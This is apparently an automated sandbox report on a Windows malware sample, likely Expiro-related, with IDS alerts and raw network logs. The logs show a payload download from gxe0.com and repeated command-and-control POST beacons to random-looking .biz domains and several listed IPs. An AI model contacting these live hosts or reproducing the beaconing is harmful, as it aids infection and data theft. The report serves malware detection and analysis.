                      Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000002.00000002.2219019323.0000000002DDE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.000000002214F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2069405714.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2145398702.0000000022120000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2191785418.0000000002B7F000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020AE4000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2169383134.00000000022C6000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000002.2275324060.0000000020B20000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070075040.0000000002B79000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000002.00000003.2070521735.000000007F920000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: cmd.pdb source: esentutl.exe, 00000005.00000003.2139842798.00000000052A0000.00000004.00001000.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DB5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,2_2_02DB5908
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
                      Source: C:\Users\Public\Libraries\aymtmquJ.pifFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior

                      Software Vulnerabilities

                      barindex
                      Suspicious execution chain found
                      Source: C:\Windows\System32\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 01037394h10_2_01037188
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 01037CDCh10_2_01037A88
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_01037E58
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then jmp 01037CDCh10_2_01037A7B
                      Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeCode function: 4x nop then mov dword ptr [ebp-1Ch], 00000000h10_2_01037E56

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49707 -> 54.244.188.177:80
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:52499 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:51298 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:50747 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:63540 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.5:51156 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.5:60928 -> 1.1.1.1:53
                      Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:50005 -> 82.112.184.197:80
                      Queries random domain names (often used to prevent blacklisting and sinkholes)
                      Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
                      Source: unknownNetwork traffic detected: DNS query count 48
                      Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 2_2_02DCE4B8 InternetCheckConnectionA,2_2_02DCE4B8
                      Source: global trafficTCP traffic: 192.168.2.5:49771 -> 51.195.88.199:587
                      Source: unknownDNS query: name: api.ipify.org
                      Source: unknownDNS query: name: api.ipify.org
                      Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 198.252.105.91:443
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49707
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49707
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.141.10.107:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.141.10.107:80 -> 192.168.2.5:49708
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.5:49731
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.5:49731
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.251.16.150:80 -> 192.168.2.5:50020
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.251.16.150:80 -> 192.168.2.5:50020
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.5:50018
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.5:50018
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.246.231.120:80 -> 192.168.2.5:50044
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.246.231.120:80 -> 192.168.2.5:50044
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.246.200.160:80 -> 192.168.2.5:50017
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.246.200.160:80 -> 192.168.2.5:50017
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.5:50043
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.211.97.45:80 -> 192.168.2.5:50029
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.5:50029
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.5:50043
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 47.129.31.212:80 -> 192.168.2.5:50011
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.5:50011
                      Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 35.164.78.200:80 -> 192.168.2.5:50023
                      Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 35.164.78.200:80 -> 192.168.2.5:50023
                      Source: global trafficTCP traffic: 192.168.2.5:49771 -> 51.195.88.199:587
                      Source: global trafficHTTP traffic detected: GET /yak2/233_Juqmtmyadyy HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: gxe0.com
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST /lcoyxsnwq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /clmhymdikmk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /v HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /jo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /ksc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /aunxkp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /h HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /sqxjvguhdtdacidd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /epmanlipym HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /vfpepibjtu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /ctaniunjcxta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /duhfjaeqhlnmwtn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /khahgpo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /xyttxtxgf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /fckn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /nsnnyu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /cakchsrrlpkav HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /kfhn HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /rb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /xkcbxhnrv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /dkglfbueemimxh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /krmiyakxt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /cbhxke HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /mwpi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /pfrxci HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /bqdrapkxlqcka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lpuegx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /ga HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /mshka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /mvnulpmrxwqe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /ueacef HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /qologlfowpsjwwtq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: saytjshyf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /cr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vcddkls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /oiqbeltfrlpts HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /jwvwqanfys HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fwiwk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /rheljawehu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tbjrpv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /jlc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: deoci.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /iq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /rofptsppofgiww HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gytujflc.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /uiwlhtxrxipw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qaynky.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /gvskbqofkpgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bumxkqgxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /sbnrqyxuvimud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
                      Source: global trafficHTTP traffic detected: POST /s HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 832
